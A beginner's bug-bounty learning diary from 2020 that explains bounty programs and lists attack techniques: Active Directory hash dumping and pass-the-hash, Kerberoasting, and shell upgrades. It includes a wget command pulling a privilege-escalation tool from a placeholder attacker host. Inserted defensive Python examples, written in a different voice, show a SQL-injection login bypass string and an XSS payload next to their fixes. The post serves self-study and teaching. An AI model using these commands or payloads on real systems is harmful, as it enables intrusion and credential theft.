Ethical Hacking Diaries #1 — WTF is a Bug Bounty? — Ceos3c

Stefan Rows
Published in Bug Hunter Life
18 min read · Mar 10, 2020

I was thinking about starting this for a long time. I am still not sure if I want to dedicate myself to another task, but I have the feeling this is the right thing to do. But, where to start? And start what actually? We’ll get to this. This first part of the Ethical Hacking Diaries is going to be rather lengthy, as I need to explain where I am coming from and what exactly all of this is about.

This blog initially started as a platform to document stuff for none other than myself. I wanted to write stuff that I eventually need again later down somewhere, so I thought the easiest way to keep things organized was by starting a blog. In the past few years, I mostly created very thorough step-by-step tutorials for complicated things revolving around Linux, Open Source and the occasional Hacking tutorial. Enabling even a beginner to follow through a complicated task like setting up a FOG imaging server.

I never really used this platform as an actual blog in the classic sense. But I want to change that, I don’t want to be just another tutorial site like hundred others out there, I strive to build a community of likeminded people.

Now what has triggered that shift in perspective you might ask? Let me elaborate.

Over the past few years, I went on and off on a journey to become an Ethical Hacker. I have been interested in Hacking since I was a little kid and saw the movie Hackers, with a very young (and god damn attractive) Angelina Jolie back in the day. Even though I devoured all kinds of Hacking movies throughout my childhood, I never actually started with Hacking, because simply put, I always thought I was too dumb for it, so I didn’t even bother starting.

That changed around 2012 when I had an old laptop lying around that I didn’t know what to do with. I don’t recall how I came upon it back then, but I ended up installing BackTrack 2 on it (Kali Linux’s predecessor). I had no freaking clue what I was doing. I played around with it a bit, started a couple of tools and didn’t know what to do. That was when I discovered Kody’s blog over at Nullbyte. My heart almost stopped when I found out that there are actual step-by-step instructions out there on how to test the strength of (your own 😉 ) WiFi Network. I was immediately hooked and ordered my (still going strong) Alfa AWUS036H network adapter.

Even though I dug it, I still didn’t take it seriously enough. I just played around with some BackTrack, and later Kali, tools. A couple of years had to pass until things started to change.

My day job to this day is being a System Administrator. I have 10+ years of experience in the industry. But I never considered that being an actual Hacker could be a possible career path for me.

Things started changing

2016, the year I created Ceos3c. From 2016 on I had a little bit more contact with the Hacking world. At that point, I had probably installed Kali Linux over a hundred times, because I always f***** up my system at some point, so I was ready to create my first “How to install Kali Linux” tutorial.

A little bit later, in 2017, I even created my first OverTheWire Bandit Walkthrough on YouTube. If you watch the video (don’t), you’ll see that I still didn’t have a freaking clue about Hacking. At this point, I had already created very lengthy and complex tutorials about AWS Cloud stuff, all kinds of Open Source projects, even a couple of very basic Nmap Tutorials and so forth, yet I still thought I was way too dumb to learn “real Hacking”. I had already dabbled a bit in CTFs using Vulnhub at this point, but I was only able to solve challenges if one of my tools (Metasploit, Nmap, etc.) found a vulnerability. Because, you guessed it, I had no freaking idea what I was doing. Impostor syndrome is real.

From 2017 to 2019 I created a couple of beginner tutorial series for Metasploit, Nmap and all the other well-known tools. I knew the basics, I knew how to solve some very easy CTFs, but I still had no “real Hacking” knowledge. I started to read more about Web Application Security and I think right around the summer of 2019 I heard the words “Bug Bounty” for the first time in my life.

Why not just become a Full-Stack Web Developer?

In July 2019 I had the idea to become a Full-Stack Web Developer. To be honest, at this point, I was burnt out. I didn’t want to write any more step-by-step articles about topics I didn’t care about (Go to hell, Anaconda!).

I always wanted to learn how to code, but learning Python was always too theoretical for me, as I am more of a visual learner. So I decided to go for Web Development. After all, at that point, I had already created around 10 different Websites, mostly using WordPress. I was always annoyed by how constrained you are with those frameworks, but I enjoyed the designing part, so I figured, why not try?

Another reason in the back of my head was that I wanted to learn Web Dev to better understand Web Apps, because I had no idea how stuff worked behind the curtain. I had some hope that it would make me a better Hacker, no matter how the whole endeavor turned out in the end.

From July 2019 until about October 2019 I went full-bore into Web Development and finished almost two 45h boot camps. I decided to go for JavaScript, Node, React… The trendy thing to do. I enjoyed the journey. I finally started to understand, at least in bits, how things work, why you use JavaScript, how HTML works, etc.

At the beginning of October 2019, I had a Yoga Teacher Training scheduled in Thailand that would take 6 weeks out of my life without any chance of learning or doing any computer stuff. I kind of knew beforehand that this would probably be the breaking point for me, that after the training I probably wouldn’t get back into Web Development and would look for something new.

Now, don’t get me wrong. Before flying to Thailand, I was able to create a Full-Stack Web App from scratch. I knew my HTML, my CSS, and just enough JS to create simple but good-looking projects. I liked coding at this point. But when I came back, I needed a bit of time to get back into it. And I never fully did. As expected. I was drawn back to something else, the only thing that has always stuck with me over the years.

I started to become more interested in Hacking again (hey, surprise!). Now that I knew a bit more about how Websites work, how the Web works in general and so on, I thought it’d be a good time to start digging into Hacking again.

Looking back, I don’t regret spending countless hours on becoming a Web Developer. I even had an interview lined up as a Junior Developer, but I canceled it in the end. I somehow knew this path wouldn’t make me happy either. Sitting in an office coding away on stupid business applications I couldn’t care less about didn’t sound tempting to me at all.

A New Dawn

I needed a plan. And fast. I recalled that I had heard about “Bug Bounties” about half a year ago, and I hit up YouTube. I discovered STÖK’s YouTube Channel and got a primer on Bug Bounties. Not only did his persona resonate with me, but the whole Bug Bounty thing sounded like exactly the area I want to work in.

I went down a Rabbit Hole. I discovered other names in this space that kept popping up again and again, like @Nahamsec, @tomnomnom, @thecybermentor, @jhaddix and a couple of others. I consumed all of their content about how to get started with Bug Bounties on YouTube and on Blogs. It seemed like exactly the community I want to be involved with. Lots of like-minded people who have fun breaking stuff. The only problem was/is, I am really bad at Web Applications.

It became even clearer that I needed a plan, and a good one at that.

Becoming a Student again

Before embarking on this Web Application Security journey, I had some experience with infrastructure. I knew the basics, I knew how to use Linux, how to use Metasploit, Nmap and some other tools, but I never had any false expectations of myself. I consider myself a noob at hacking, and that probably will never change. But I like to be the dumbest person in the room and ask questions, because that’s the way you learn.

When learning something new, I like structure. This became clear to me when I did my Web Development Bootcamps, which were very well structured. I needed something like that.

Oh boy, was I lucky that The Cyber Mentor had just released his absolutely, ridiculously excellent “Practical Ethical Hacking” course on Udemy. EXACTLY what I needed! The course takes about 25 hours and I think I finished it within 2 weeks. Hands down, this is the best Hacking course out there right now.

I learned a ton doing this course. And I am going to do the whole freaking thing again, that’s how awesome it was.

I finished my course, let’s start Bug Bounty hunting!

That was my expectation. As we all know, expectations != reality. I now have kind of solid basics, but finding bugs on a live website is really, really hard. This was just the beginning, but I was excited and ready to dig in.

I quickly realized that I have a lot to learn before I will find my first bug. I bought a Hackthebox premium account and got started, because, in my opinion, there is no better way to learn than trying to break stuff. So far, I have ~7 boxes under my belt.

Game Plan

My game plan at this point looks like this: Hack stuff, every single day. I haven’t found a Bug Bounty program I’d like to stick with yet, otherwise I’d practice on that. But to be honest, I find it hard to choose a program as a beginner; I guess that’s one of the hardest parts.

Seeing programs with more than 300 participants seems pretty frightening if you rate your skills at level 0.5 out of 10. I’ll let you know as soon as I’ve chosen a program to hack on.

This new series of Blogs will also be a part of this Game Plan. I will try to write down what I have learned within a week to fortify my knowledge, and of course, to share it with you guys. This community is so incredibly helpful and supportive that I want to give back, and that’s what I’m trying to do with those blog posts.

So, to get back to the actual topic of this post.

So, WTF is a Bug Bounty?!

By now you have probably looked up that information yourself, but in case you have not, let me give you a very high-level overview of what Bug Bounties are.

Simply put, a Bug Bounty Program is a program that a company intentionally puts together to allow hackers to legally test the security of their Website, App, API or a whole CIDR range, and not only that, but also to get rewarded if they find a vulnerability.

HackerOne and Bugcrowd are the platforms those programs are hosted on. I won’t go over the whole legal side because I don’t want to give any false information, as I am new to this myself. The info is out there, look it up.

The company that created a Bug Bounty Program also provides a scope on which you can legally hack, and they also provide “out of scope” items that you are not allowed to hack on. They also provide certain rules you need to adhere to.

Every program is different. Some programs only offer points for prestige and rank on either of the platforms, others offer low to very high (10.000$+++) rewards per vulnerability.

There are also invite-only programs which you only get invited to if you reach a certain rank. Those programs offer even far higher rewards for findings, and there are events and Hackathons hosted by either HackerOne or Bugcrowd, where extremely high rewards are possible. Those events are also used to get to know each other and hack together with the community, a great thing in my opinion!

Now, don’t get any false hopes. You don’t start learning how to hack and within a month find your first 10.000$ bug. That’s not how it works. There are a lot of professionals with decades of experience on those platforms. There is no easy money in Bug Bounty; the sooner one realizes that, the better. You have to enjoy this stuff. If you are in it for the money, I don’t see much hope for you.

That, in essence, is what bug bounty programs are. They give hackers a platform to be “on the good side” and earn their living without needing to participate in criminal activity. It also spawns a whole new breed of Hackers, those who legitimately want to make the Internet safer.

What have I learned in the past month?

A ton. I have probably learned more about Hacking in the past month than in the past 5 years combined. Again, doing The Cyber Mentor’s course was extremely helpful, but I have to do it again because I have already forgotten certain things. Taking notes is extremely important, btw.

In this blog post, because it is the first one, I’ll tell you what I have learned in the past month. The next blogs will be shorter and only cover what I have learned in the past week.

I will just give you an overview. If you are interested in a particular topic, leave a comment below and I will try to cover it more in-depth in a separate article or video. This will be another lengthy section; I will go through my notes and let you know what I have learned on each topic.

Methodology

I start with Methodology because I think building your Methodology is one of the most important things. It helps me stay organized, and going through a fixed set of steps keeps me on track. At this moment, on every CTF that I practice on, I refine my Methodology and my notes. I cut certain steps out and add others in.

If you want to learn about Methodology, check out Jason Haddix’s video. There is a ton of material out there regarding Hacking methodology.

The importance of Notes

I knew that taking good notes is very important. Thanks to the two Web Development Bootcamps I went through, I had already established a solid note-taking game. I use Evernote. For me, it’s the most comfortable way of keeping my notes sorted nicely, and it’s also free.

Taking good notes as a Hacker / Pentester / Bug Hunter is crucial. You will work with your Notes open at all times, at least I do, and I think other Hackers do this too.

Own your notes, keep them organized, refine them and learn to love them.

Reconnaissance

I learned a ton about doing good reconnaissance. The more stuff you gather, the easier it is for you to get access. If you slack in recon, you’ll struggle at executing later.

I knew a bit about Reconnaissance beforehand, but especially in regards to Web, I learned a lot of new stuff.

Passive Reconnaissance Tools

  • Target Validation
  • WHOIS Lookup
  • nslookup
  • dnsrecon

Subdomain Enumeration

Fingerprinting

  • Nmap
  • Wappalyzer
  • WhatWeb
  • BuiltWith
  • Netcat

Data Breaches

That’s a lot of stuff to wrap your head around. You pick what works for you and integrate it into your Methodology.

Active Directory

The AD part of The Cyber Mentor’s course is excellent. I learned a ton from it. Let me summarize:

General AD Stuff

  • The AD DS Data Store
  • Ntds.dit file (stores the password hashes)
  • SAM Hashes
  • Local User hashes
  • Kerberos
  • How Kerberos works

Top Five Ways I got Domain Admin before Lunch

Domain Enumeration

  • PowerView

Gaining Domain Access

  • LLMNR Poisoning
  • SMB Relay Attacks
  • BloodHound — Downloads Domain Data & Visualizes it. Very useful.

Pass the Hash Attacks

  • NTLM vs NTLMv2
  • NTLM hashes can be passed, NTLMv2 hashes not!

Crackmapexec

  • Only works if credentials are available. Tool passes the password to other services/machines.
  • Using psexec.py to connect with the gathered hash

secretsdump.py

  • Used to dump hashes

Mitigation of Pass The Hash attacks

  • Limit Account Re-Use
  • Strong Passwords
  • Privilege Access Management

Token Impersonation

  • What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. “Cookies for computers”

Token Impersonation Attack

  • Requires a Username + Password of any machine

Kerberoasting

  • Using Impacket
  • Needs User Account with Credentials to work. It doesn’t need to be an Admin account.

GPP / cPassword Attacks

  • Always worth checking for, especially on older Servers.
  • Metasploit Module -> auxiliary/scanner/smb/smb_enum_gpp

Mimikatz

  • Tool used to dump hashes of all kinds
  • SAM Hashes
  • Golden Ticket Attacks

Active Directory is a huge topic on its own. I have to go through the course again to fully understand all of it, but I leveled up my AD game a few levels.

Shells

I don’t know what else to call this, but I feel like it deserves its own section. Running manual exploits usually leaves you with dumb shells, which you generally want to elevate to beautiful shells. I learned a lot about this, and having a fully interactive shell is extremely helpful compared to a dumb one.

This is an excellent Article about Upgrading Simple Shells to Fully Interactive ones by Ropnop. Read it.

Metasploit

Elevate Dumb Shell to Meterpreter Shells

  • After a dumb shell has been created with a Metasploit exploit, hit CTRL + Z to move the shell to the background
  • Type: sessions and note the session ID
  • Type: sessions -u 1 -> This spawns a meterpreter shell if available (1 being the session ID noted in the previous step)
  • Type: sessions -i 2 -> To use the newly spawned meterpreter shell

Reverse Shell vs Bind Shell

  • Reverse Shell — Target connects to attacker
  • Bind Shell — Attacker connects to target

If Username + Password are available

  • Create Meterpreter Shell from scratch with exploit/windows/smb/psexec

Impacket

  • Can also be used to create Shells
  • smbexec
  • wmiexec
  • psexec

Transferring Files

When exploiting servers, you will most likely find yourself in a situation where you want to either upload a tool or an exploit to a server, or download files from the server to your attacking machine. I learned a couple of techniques that help with that.

SimpleHTTPServer

  • Pre-installed on Kali
  • Starts an HTTP Server on Port 8000 in the current directory which can be accessed from other hosts on the network to transfer files.
  • You can use: wget http://ipofattacker:8000/unix-privesc-check.tar to download files
  • Certutil
  • Pyftpdlib

SSH

  • I like this method a lot if you have an SSH user on the target
  • scp /path/to/file username@IP:/path/to/destination
  • Use pwd on the target to find the correct destination directory

Web

Now to the fun part. I put my focus on Web because I want to get started with Bug Bounties, so I learned a ton here as well. Burp deserves a section of its own because it is so widely used in Web Application testing, but I’ll try to summarize as best as I can. I upgraded to Burp Pro since my trial had expired. You can use the free Community edition with limited functionality, which is perfectly fine for the beginning.

The OWASP Top Ten

The OWASP Top 10 is a list of the Top 10 Web Application Security Risks. The OWASP Top 10 are going to be a part of every interview you participate in. I actually just went through one, and they asked a ton of OWASP questions. I knew I needed to at least understand the OWASP Top Ten on a high level, so once again, The Cyber Mentor’s course helped me a ton to understand them, as he goes over every one of them.

1 — SQL Injection

  • Testing for SQL injection using Burp Intruder
  • Logging in as the admin without authentication using SQL Injection (So much fun)
  • Learning about SQL Injection Payloads and how to use Intruder to test for them
  • Learned how to prevent SQL Injection
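The “admin login without authentication” and the “how to prevent it” bullets above are two sides of one coin, so here is an added example (mine, not code from the post or from the course) that puts the vulnerable login beside the fixed one. It assumes a constructed in-memory SQLite table with a single hypothetical user; the hypothetical function names login_vulnerable and login_parameterized are my own.

```python
import sqlite3


def make_db():
    # Constructed sample data: one user in an in-memory database, nothing real.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # The query is assembled by string formatting, so whatever the user types
    # becomes part of the SQL text. A username ending in a quote and a comment
    # marker closes the string early and comments out the password check.
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    # Placeholders send the values to the driver separately from the statement,
    # so input is always data: the quote and the comment marker are just characters
    # that get compared against the username column and never match.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    # Runs the same inputs through both implementations for comparison.
    bypass_attempt = ("admin' --", "anything")
    real_creds = ("admin", "correct horse battery staple")
    return {
        "vulnerable_with_bypass": login_vulnerable(make_db(), *bypass_attempt),
        "parameterized_with_bypass": login_parameterized(make_db(), *bypass_attempt),
        "parameterized_with_real_creds": login_parameterized(make_db(), *real_creds),
    }


if __name__ == "__main__":
    print(demo())
```

The fix is not escaping quotes by hand; it is keeping SQL text and user data on separate channels, which every real driver offers (placeholders in sqlite3 and psycopg2, prepared statements in JDBC, an ORM’s query builder). The same comparison works against any engine that accepts the standard comment marker.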

2 — Broken Authentication

  • Enumerate users or emails through improperly configured login forms
  • Abuse forgot password forms for user enumeration

3 — Sensitive Data Exposure

  • Looking through all kinds of folders on a website in Burp
  • Searching for Keys
  • Checking Security Headers
  • Testing SSL with Nmap’s ssl-enum-ciphers script
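For the “Checking Security Headers” bullet, here is an added example of what such a check actually evaluates; it is my own code, not the post’s or the course’s, and it works on a constructed header block shaped like curl -I output (the host, Server value and max-age are made up). The function names parse_raw_headers and audit_security_headers are hypothetical. It goes slightly beyond the bullet by also checking the HSTS max-age value and the clickjacking protection that CSP frame-ancestors can provide instead of X-Frame-Options.

```python
import re

# Constructed sample response, as `curl -I` would print it for a poorly configured host.
SAMPLE_RAW_HEADERS = """\
HTTP/1.1 200 OK
Date: Tue, 10 Mar 2020 12:00:00 GMT
Server: Apache/2.4.29
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=300
X-Frame-Options: SAMEORIGIN
"""

ONE_YEAR_SECONDS = 31536000


def parse_raw_headers(raw):
    # Turns "Name: value" lines into a dict with lower-cased names; the first line
    # is the status line and is skipped. Header names are case-insensitive.
    headers = {}
    for line in raw.splitlines()[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_security_headers(headers):
    # Returns a list of human-readable findings; an empty list means nothing to report.
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        m = re.search(r"max-age=(\d+)", hsts)
        if not m or int(m.group(1)) < ONE_YEAR_SECONDS:
            findings.append("Strict-Transport-Security max-age shorter than one year")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("missing Content-Security-Policy")

    # Either header stops the page from being framed by other origins.
    if "x-frame-options" not in h and not (csp and "frame-ancestors" in csp):
        findings.append("no clickjacking protection (X-Frame-Options or CSP frame-ancestors)")

    server = h.get("server", "")
    if re.search(r"\d", server):
        findings.append(f"Server header discloses a version: {server}")

    return findings


if __name__ == "__main__":
    for finding in audit_security_headers(parse_raw_headers(SAMPLE_RAW_HEADERS)):
        print("-", finding)
```

Paste the output of curl -I against a host you are allowed to test into SAMPLE_RAW_HEADERS (or read it from a file) and the audit prints what a report would list under this OWASP category; the thresholds are my choices and should follow the program’s or your client’s policy.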

4 — XXE (XML External Entities)

  • XXE Payloads
  • Trying XML payload uploads and checking in Burp what is returned
  • How to prevent XXE

5 — Broken Access Control

  • Checking HTML code for hidden forms or fields, etc.
  • Unauthenticated access to restricted areas

6 — Security Misconfiguration

  • One of the most common issues
  • Result of insecure configurations
  • Outdated libraries or services

7 — XSS (Cross-Site Scripting)

  • I ❤ XSS
  • XSS Payloads
  • How to test for XSS using Burp
  • Different Types of XSS (Stored, Reflected, DOM)
  • How to prevent XSS
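For the “How to prevent XSS” bullet, here is an added example (my code, not the post’s or the course’s) that shows why stored and reflected XSS happen and what output encoding does about it. The comment text is constructed, and the function names render_unsafe, render_safe and render_attribute_safe are hypothetical. It also covers the attribute context, where encoding the quote characters matters as much as the angle brackets.

```python
import html

# Constructed sample of a stored comment that contains markup (not from any real site).
STORED_COMMENT = '<script>alert("stored xss")</script> nice post!'


def render_unsafe(comment):
    # Interpolates user input straight into the HTML: markup in the comment becomes
    # markup in the page, which is exactly how stored and reflected XSS arise.
    return f'<p class="comment">{comment}</p>'


def render_safe(comment):
    # Entity-encodes &, <, >, " and ' so the browser displays the text but never
    # parses it as a tag. html.escape is the standard-library way to do this.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute_safe(value):
    # Attribute context: the value sits inside a quoted attribute, so quotes must be
    # encoded too (quote=True), otherwise input could close the attribute and add
    # its own attributes such as an event handler.
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def contains_tag(rendered, tag):
    # Small helper for the checks below: is a raw <tag ...> present in the output?
    return f"<{tag}" in rendered.lower()


if __name__ == "__main__":
    print(render_unsafe(STORED_COMMENT))
    print(render_safe(STORED_COMMENT))
    print(render_attribute_safe('" autofocus onfocus="'))
```

Encoding is context-specific: what is safe in an HTML text node is not automatically safe inside an attribute, a URL or a script block, which is why template engines that auto-escape per context (Jinja2 with autoescape on, React’s JSX) are the practical fix rather than hand-written escaping in every view.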

8 — Insecure Deserialization

  • Rather uncommon and hard to exploit
  • Leads to RCE

9 — Using Components with Known Vulnerabilities

  • Learned how to scan for those using Burp extensions
  • Struts 2

10 — Insufficient Logging & Monitoring

  • Can be exploited to maintain system access or pivot through the system
  • Brute Force undetected
  • Failing to detect breaches
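The “Brute Force undetected” bullet is the one item in this list that can be illustrated from the defender’s side, so here is an added example (my code, not the post’s or the course’s) of the detection logic a login service could run over its own authentication log. The log lines and IP addresses are constructed (documentation ranges), the line format is an assumption, and the function name detect_bruteforce is hypothetical. It uses a sliding time window per source address, which catches a burst of failures without being fooled by a few spread-out typos.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample authentication log: one burst from 203.0.113.5 and two
# spread-out failures from 198.51.100.7 (a user mistyping a password).
SAMPLE_LOG = """\
2020-03-09T10:00:01Z login result=FAILED user=admin src=203.0.113.5
2020-03-09T10:00:04Z login result=FAILED user=admin src=203.0.113.5
2020-03-09T10:00:07Z login result=FAILED user=root src=203.0.113.5
2020-03-09T10:00:09Z login result=SUCCESS user=stefan src=198.51.100.7
2020-03-09T10:00:12Z login result=FAILED user=test src=203.0.113.5
2020-03-09T10:00:15Z login result=FAILED user=admin src=203.0.113.5
2020-03-09T10:00:20Z login result=FAILED user=guest src=203.0.113.5
2020-03-09T10:03:00Z login result=FAILED user=stefan src=198.51.100.7
2020-03-09T10:08:00Z login result=FAILED user=stefan src=198.51.100.7
"""

# Assumed line format; adapt the regex to whatever your application actually writes.
LINE_RE = re.compile(r"^(\S+) login result=(\w+) user=(\S+) src=(\S+)$")


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {src: max_failures} for sources with >= threshold failed logins
    inside any window of window_seconds. Sources below the threshold are omitted."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; in production, count these as well
        ts, result, _user, src = m.groups()
        if result == "FAILED":
            failures[src].append(parse_ts(ts))

    alerts = {}
    for src, times in failures.items():
        times.sort()
        start = 0
        # Two-pointer sliding window: advance `start` until the window fits.
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(src, 0):
                alerts[src] = count
    return alerts


if __name__ == "__main__":
    for src, count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {src}: {count} failed logins within 60s")
```

Without the FAILED/src fields this check is impossible, which is the point of the OWASP category: the vulnerability is not the brute force itself but that nothing records or reviews the attempts. Threshold and window are policy decisions; the same structure feeds a lockout, a CAPTCHA trigger or a SIEM alert.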

Knowing the OWASP Top 10 is essential for doing Bug Bounties. Period. You have to have those down and then take your study further from there.

Burp Suite

  • Most popular tool for Bug Bounties (literally everyone uses Burp)

General Stuff

  • Learned all the basic functionality
  • Learned what all the different tabs are doing
  • Learned how to read traffic
  • Learned about scopes
  • Learned how to recognize successful fuzzing attempts

Intruder

  • Burp Intruder can be used to attack all kinds of forms
  • You can run brute-force attacks using Burp Intruder
  • You can test for XSS, SQL Injection and Fuzz all the things with Intruder
  • Credential Stuffing

Repeater

  • Repeater allows you to modify requests and send them to the server

Extender

  • Lots of Burp Addons are available to install

Decoder

  • Allows you to decode stuff (base64 for example) right in Burp

I feel like this is just a small part of what Burp is, but it would get out of hand to put everything in here now. I will add to it in the following Blog posts in greater detail.

Directory Brute-Force

  • Using Gobuster or Dirbuster
  • Very important to find hidden files, dev sites, or generally get an overview of a website’s folder hierarchy

Subdomain Enumeration

  • As previously mentioned in Passive Reconnaissance — Very important in Bug Bounties to find hidden subdomains, dev subdomains etc.
  • OWASP Amass
  • Sublist3r
  • crt.sh
  • Assetfinder
  • Httprobe
  • Gowitness

Enumerating Web Tech

  • How websites are built
  • Wappalyzer Firefox Addon
  • WhatWeb (Kali Tool)

Now there is a lot more I could go over, but I feel like it makes more sense going a bit more in-depth into those topics in future blog posts.

One last thing I want to mention though is what I have learned from Hackthebox within this time.

Stuff learned from Hackthebox

I use Hackthebox almost exclusively as my practice resource next to actual Bug Bounties. In the coming Blog articles, you will read a lot about what I have learned from solving Hackthebox machines. According to their TOS, I am only allowed to share details on machines that are already retired.

You will also find walkthroughs of Hackthebox machines on my YouTube Channel in the future. I will also do quick weekly Vlogs about stuff I have learned over there. Make sure to subscribe.

Because this post is already becoming a behemoth and potentially the longest article I have written on here, I will keep the last month’s “what I’ve learned from Hackthebox” in an easily digestible bullet point format.

Privilege Escalation

Redis

  • Learned what Redis is and how to exploit it

SSH keys

  • Learned a ton about SSH keys and how to exploit them
  • Also learned how to crack them if a weak password is used

Exploits

  • Learned how to use manual exploits
  • Learned how to read exploits
  • Learned that I need to convert some exploits with dos2unix so their line endings work on Linux
  • Example on Kali: dos2unix 47681.sh

Bash

  • Learned how Bash exploits use ${} placeholder values

Enumeration

  • Enumerate all the things.
  • If you are stuck — Enumerate some more
  • Look through all folders on a Server
  • Check .ssh folders
  • Check /opt/ folders
  • Check /home/ folders
  • Check folders and config files of installed services
  • Did I mention to enumerate some more?

Password Cracking

  • Cracking all kinds of passwords using tools like
  • Hashcat
  • JohnTheRipper
  • Hydra
  • Burp Suite

Brute Forcing stuff on CTF’s

  • …Is mostly pointless

Searchsploit

  • Learned how Searchsploit works and how useful it is

Searching for Exploits

  • Google all the Server/Service versions you find through enumeration and look for exploits
  • The key to easy CTF’s

SMB

Does this ever end?

Even though I have already spent five hours writing this blog post, I feel like we are just scratching the surface. I have probably forgotten to mention several things I’ve learned, but I felt like I needed to initiate this whole series with as much detail as I could.

The next posts will be much more in-depth and we will be going more technical on all the different things.

I hope that this series will find someone’s interest and, in the best case, motivate some of you to get started as well. I’m not gonna lie, it is hard. It is hard, but with this blog, I want to show you that it’s possible if you put in the work. I do not come from a background of higher education; I learned everything I know by myself and with the help of the incredible Hacking community. Now is the time to give back, and I hope I can achieve this through this blog.

Wrapping Up

All of that being said, I hope to see you back the next week. You can follow me on Social Media or Subscribe to the Newsletter in the Sidebar to stay up-to-date with this blog. Thanks for reading!

Check out Ceos3c.com as well, I have a lot of beginner-friendly Hacking & Linux tutorials up there to get you started!

Originally published at https://www.ceos3c.com on March 10, 2020.
